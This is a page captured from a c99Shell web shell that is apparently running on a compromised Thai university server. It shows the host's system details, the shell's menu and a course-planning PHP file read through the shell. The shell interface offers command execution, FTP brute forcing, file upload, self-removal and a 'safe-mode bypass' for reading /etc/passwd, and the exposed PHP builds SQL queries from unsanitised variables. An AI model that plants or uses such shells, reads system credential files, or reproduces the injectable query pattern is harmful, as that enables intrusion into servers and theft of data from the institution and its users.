!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/edu_depart/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addCoseMethod.php (16.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../include/Function.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
//=== SESSION
        
$Username $valid_user
        
        
        
/**  Config Table for This Page  */
        
$myTable1 "personal_tb";
        
        
/**  Table  -->  personal_tb  */
        
$query1 " SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE  Teacher_code='$Teacher_code' ";
        
$result1 $dbObj->execQuery($query1);
        
$rss $dbObj->fetchArray($result1);
        
        
$Teacher_code $rss['Teacher_code'];
        
    
    } 
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="../js/utilities.js"></script>
<script language="javascript" src="../js/calendarDateInput2.js"></script>
<script language="javascript">
function checkData() {
var formObj = document.myForm;
    if( (formObj.courseCode.value == "" ) && (formObj.courseName.value == "" ) && (formObj.courseUnit.value == "" ) ) { alert("กรุณากรอกข้อมูลให้ครบด้วยค่ะ" ); formObj.courseCode.style.backgroundColor='#F1F9FC'; formObj.courseCode.focus();    return false; }
    else if(formObj.courseCode.value == "" ) { alert("กรุณากรอก รหัสวิชา"); formObj.courseCode.style.backgroundColor='#F1F9FC'; formObj.courseCode.focus(); return false;} 
    else if(formObj.courseName.value == "" ) { alert("กรุณากรอก ชื่อวิชา"); formObj.courseName.style.backgroundColor='#F1F9FC'; formObj.courseName.focus(); return false;} 
    else if(formObj.courseUnit.value == "" ) { alert("กรุณากรอก หน่วยกิจ"); formObj.courseUnit.style.backgroundColor='#F1F9FC'; formObj.courseUnit.focus(); return false;} 
    else if(formObj.Total_std.value == "" ) { alert("กรุณากรอก จำนวนนักศึกษา"); formObj.Total_std.style.backgroundColor='#F1F9FC'; formObj.Total_std.focus(); return false;}
    else if(formObj.Total_hour.value == "" ) { alert("กรุณากรอก จำนวนชั่วโมง"); formObj.Total_hour.style.backgroundColor='#F1F9FC'; formObj.Total_hour.focus(); return false;}
    else if(formObj.Mainidea.value == "" ) { alert("กรุณากรอก แนวคิดหลัก"); formObj.Mainidea.style.backgroundColor='#F1F9FC'; formObj.Mainidea.focus(); return false;}
    else if(formObj.Objective.value == "" ) { alert("กรุณากรอก วัตถุประสงค์"); formObj.Objective.style.backgroundColor='#F1F9FC'; formObj.Objective.focus(); return false;}
    else return true ;
}
</script>
<script language="JavaScript" type="text/JavaScript">
function browse()
{
    myForm.Filetex.src = myForm.Filetex.value;
}
</script>

<title><?=$_Config_sitename;?></title>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset>
     <table width="780" border="0" cellspacing="0" cellpadding="0">
      <form id="myForm" name="myForm" method="post"   enctype="multipart/form-data" action="InsertCorseMethod.php" onSubmit="return checkData()">
      <tr>
        <td height="5"></td>
      </tr>
      <tr>
        <td height="30" background="../images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>&raquo; <a href="CourseByYear.php">ข้อมูลแผนการสอนรายวิชา</a> &raquo; <span class="NOTE">เพิ่มข้อมูลแผนการสอน</span></strong></td>
        </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
    
        <td align="center"><table width="750" border="0" align="center" cellpadding="1" cellspacing="3" bgcolor="#EEEEEE" style="border:1px solid #EEEEEE">
          <tr bgcolor="#eeeeee">
            <td colspan="2" align="right" bordercolor="#99CC99" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td width="23%" align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">หลักสูตร:</font></td>
            <td width="76%" bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="programId" id="programId" class="input">
              <?php
                $dbObj
->RegDBConn();
                
$strSQL1 " SELECT * FROM  Program   Where  programStatus='Y' ";
                
$result1 mysql_query($strSQL1);
                while( 
$rs1 mysql_fetch_array($result1) ) {
                    echo
"<option value=\"$rs1[programId]\" ><b>$rs1[programName]</b></option>\n";
                }                
              
?>
            </select></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF">ภาค/ปีการศึกษา:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">
              <select name="semester" id="semester">
                <?php
                    $strSQL1 
" SELECT * FROM SysSemesterDes";
                    
$result1 mysql_query($strSQL1);
                    while( 
$rs1 mysql_fetch_array($result1) ) {
                        echo
"<option value=\"$rs1[semester]\" ><b>$rs1[semesterName]</b></option>\n";
                    }                
                
?>
              </select>
              /
              <select name="acadYear" id="acadYear">                
                <?php
                    $strSQL1 
"SELECT * FROM AcadYearConfig GROUP BY acadYear";
                    
$result1 mysql_query($strSQL1);
                    while( 
$rs1 mysql_fetch_array($result1) ) {
                        echo
"<option value=\"$rs1[acadYear]\" ".(($rs1["acadYear"]==(date('Y')+543))?"selected":"")."><b>$rs1[acadYear]</b></option>\n";
                    }                
                
?>
                </select>
              จำนวนนักศึกษา
              <input name="TotalStudent" type="text" id="TotalStudent" size="3" maxlength="4" style="text-align:center" onkeypress="return checkNumeric();" />
            </td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF">ชั้นปี:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="studentYear" onchange="doChange()">
              <option value="">--เลือก--</option>
              <?php
                    $strSQL 
" SELECT * FROM SysStudentYearDes";
                    
$result2 mysql_query($strSQL);
                      while( 
$rs2 mysql_fetch_array($result2) ) { 
                
?>
              <option value="<?php echo $rs2['studentYear'];?><?php echo ($rs2['studentYear']==$studentYear) ? 'selected' '';?>>
                <?php  echo $rs2['studentYear'];?>
                </option>
              <?php
                
}
?>
              </select>
              วัน
              <?php
                $sql 
" SELECT * FROM   Day    ";
                
$result3 mysql_query($sql);
                while( 
$rss3 mysql_fetch_array($result3) ) {
            
// $i = 1;
            //$oDy->RSDay();
            //while($oDy->GetRecord()) {
?>
              <input type="checkbox" name="dayId[<?php echo $i;?>]" value="<?php echo $rss3['dayId'];?><?php echo ($rss3['dayId']==$dayId[$i]) ? 'checked' '';?> />
              <font size="2"><?php echo $rss3['dayName'];?>&nbsp;&nbsp;</font>
              <?php
                $i
++;
            }
?>
              <font color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">*</font></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF">จากคาบ :</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="startTime" class="input" id="startTime">
              <?php                
                $strSQL2 
" SELECT * FROM Period ";
                
$result2 mysql_query($strSQL2);
                while( 
$rs2 mysql_fetch_array($result2) ) {
                    echo
"<option value=\"$rs2[period]\" ><b>$rs2[startTime]</b></option>\n";
                }
                
?>
              </select>
              ถึงคาบ
              <select name="endTime" class="input" id="endTime">
                <?php
                $strSQL2 
" SELECT * FROM Period";
                
$result2 mysql_query($strSQL2);
                while( 
$rs2 mysql_fetch_array($result2) ) {
                    echo
"<option value=\"$rs2[period]\" ><b>$rs2[endTime]<b></option>\n";
                }
                
?>
                </select>
              จำนวนสัปดาห์
              <input name="TotalWeek" type="text" id="TotalWeek"  size="3" maxlength="2" style="text-align:center" onkeypress="return checkNumeric();" /></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">ภาคงานสอน:</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><select name="Method_code" class="input" id="Method_code">
              <?php
                $dbObj
->DBConn();
                
$strSQL2 " SELECT * FROM method_tb ";
                
$result2 mysql_query($strSQL2);
                while( 
$rs2 mysql_fetch_array($result2) ) {
                    echo
"<option value=\"$rs2[Method_code]\" ><b>$rs2[Method_name]</b></option>\n";
                }
                
?>
              </select>
              &nbsp;<font color="#000066" face="Tahoma">แหล่งฝึก</font>
              <input name="Place" type="text" id="Place" size="49" /></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">รายวิชา:</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><input type="text" name="courseCode" size="7" class="input1" readonly="readonly" style="text-align:center" />
              <input type="text" name="courseName" size="48" class="input1" readonly="readonly" />
              <input type="text" name="courseUnit" size="7" class="input1" readonly="readonly" style="text-align:center" />
              <a href="javascript:;" onclick="NewWindow('ShowtechCose.php','courseInClassTable','860','350','yes')"><img src="../images/icons/search.gif" width="15" height="19" border="0" align="absmiddle" /></a><span class="TEXT-RED10"><sup>*</sup><span class="TEXT-ORANGE9">&lt;-- คลิ๊กที่นี่
              <input type="hidden" name="courseId" />
              <input type="hidden" name="conditionId" />
              </a></span></span></td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">วันที่เริ่มการสอน:</td>
            <td bgcolor="#FFFFFF">
                <script>DateInput('mDate', true,'DD/MM/YYYY','<?=date("d/m/Y");?>');</script>
            </td>
          </tr>
          <tr>
            <td height="22" align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">วันที่สิ้นสุดการสอน:</td>
            <td bgcolor="#FFFFFF">
                <script>DateInput('mDate1', true,'DD/MM/YYYY','<?=date("d/m/Y");?>');</script>
            </td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF">คำอธิบายรายวิชา:</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><textarea name="Mainidea" cols="75" rows="3" readonly="readonly" id="Mainidea"></textarea> </td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px">อาจารยประจำวิชา</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><table width="463" border="0" align="left" cellpadding="1" cellspacing="1">
              <tr>
                <td width="26" align="center" bgcolor="#CCCCCC">&nbsp;</td>
                <td align="center" bgcolor="#CCCCCC">อาจารย์</td>
                <td align="center" bgcolor="#CCCCCC">ผู้รับผิดชอบ</td>
                <?php 
                     $query4 
" SELECT *  FROM   tech_courseteacher    WHERE     courseId = '$courseId'     ";
                    
$result4 mysql_query($query4);
                           while(
$rs4 mysql_fetch_array($result4)){ ;
                
                         
$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" "#FFFFFF" ;                        
                      
?>
              </tr>
              <tr bgcolor="<?=$bgColor;?>" onmouseover="this.style.backgroundColor='#F5F9F9'" onmouseout="this.style.backgroundColor=''">
                <td align="center"><img src="../images/icons/linesub.gif" width="16" height="16" border="0" align="absmiddle" /></td>
                <td width="255" align="left"><?php
        
         $sql 
"Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where  Teacher_code ='$rs4[Teacher_code]' ";
          
$result2 mysql_query($sql) or die("Error".mysql_error());
          
$rss4 mysql_fetch_array($result2);
          
//echo "$rss4[Position_name] ";
          
echo  $rss4['First_name'] . $rss4['Teacher_name'] ." &nbsp;"$rss4['Teacher_lastname']  ;
         
?></td>
                <td width="172"><?=$rs4['CourseTeach'] ;?>
                  </span></td>
                </tr>
              <?php
                
# while
              
?>
            </table></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px">&nbsp;</td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" bordercolor="#99CC99" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">งานวิจัยในชั้นเรียน</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF"><font color="#000066" face="Tahoma">
              <input type="radio" name="Res_unit" value="1" />
              <font color="#000000"> ใช้
                <input type="radio" name="Res_unit" value="2" />
                ไม่ใช้  </font></font></td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px"><font color="#000066" face="Tahoma"></font></td>
            <td valign="top" bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#eeeeee">
            <td align="right" valign="top" bordercolor="#99CC99" bgcolor="#FFFFFF" style="padding-top:4px"><font color="#000066">วิธีการวัดและประเมินผล</font></td>
            <td bordercolor="#CCCCCC" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr bgcolor="#E5E5E5" class="BORDER-GREY-LIGHT" >
            <td align="right" bgcolor="#FFFFFF" class="TEXT-DARK-BLUE10">&nbsp;</td>
            <td align="left" bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF"><input type="hidden" name="Teacher_code" value="<? echo $rss['Teacher_code']; ?>" />
              <input type="submit" name="Submit" value="บันทึก" class="WIDTH60 CURSOR-HAND" />
              &nbsp;
              <input type="reset" name="Reset" value="รีเซ็ต" class="WIDTH60 CURSOR-HAND" />
              &nbsp;&nbsp;
              <input type="button" name="Button" value="ยกเลิก" class="WIDTH60 CURSOR-HAND" onclick="location.href='PlanList.php?Teacher_code=<?=$Teacher_code;?>'" /></td>
          </tr>
          <tr>
            <td bgcolor="#FFFFFF" align="center">&nbsp;</td>
            <td bgcolor="#FFFFFF">&nbsp;</td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr></form>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result1);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.016 ]--